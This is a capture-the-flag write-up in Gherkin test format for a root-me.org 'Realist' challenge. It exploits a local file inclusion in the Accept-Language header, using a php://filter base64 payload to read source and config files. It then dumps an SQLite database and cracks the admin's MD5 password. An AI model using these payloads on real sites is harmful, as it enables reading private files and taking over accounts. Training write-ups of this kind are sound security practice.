## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realist
  User:
    mr_once
  Goal:
    Get admin access

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Firefox         | 78.0.2      |
    | Owasp ZAP       | 2.9.0       |
  Machine information:
    Given I am accessing the site at:
    """
    http://challenge01.root-me.org/realiste/ch4/index.php
    """
    And it looks like a hacked web

  Scenario: Fail:None
    Given the clue to this challenge was way to big:
    """
    News
    Febuary 20, 2011
    Auto-detection of user language (v1.2).
    """
    Then there is no fail scenario

  Scenario: Success:Get admin's password
    Given at the left of the page says:
    """
    http://challenge01.root-me.org/realiste/ch4/index.php
    """
    When I made a petition to the web modifying the "Acept-Language" header
    """
    Accept-Language: '
    """
    Then I see the following warnings:
    """
    Warning:  include('): failed to open stream: No such file or directory in \
    /challenge/realiste/ch4/index.php on line 24

    Warning:  include(): Failed opening ''' for inclusion \
    (include_path='.:/usr/share/php') in \
    /challenge/realiste/ch4/index.php on line 24
    """
    When I try to read the "index.php" code using php base64 filter
    """
    Accept-Language: php://filter/convert.base64-encode/resource=index.php
    """
    Then I can see it works [evidence](indexbase64.png)
    And after converting it I can see it includes "config.php"
    """
    <?php
      require('config.php');
      createDB();

      $accepted = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
      $language = substr($accepted, 0, 2);
      ...
    """
    And I read "config.php" code
    """
    Accept-Language: php://filter/convert.base64-encode/resource=config.php
    """
    And after decoding it I can see it uses the database "db4realiste.sqlite"
    """
    <?php
      $database_file="db4realiste.sqlite";
      $database="";
      ...
    """
    When  I read the file using the same method as before
    Then I get the admin's hashed password [evidence](sqlite.png)
    And after reversing the hash online i found that
    """
    704b037a97fa9b25522b7c014c300f8a = md5(4dm1n)
    """
    And I can log as the admin [evidence](logged.png)
    And I pass the challenge
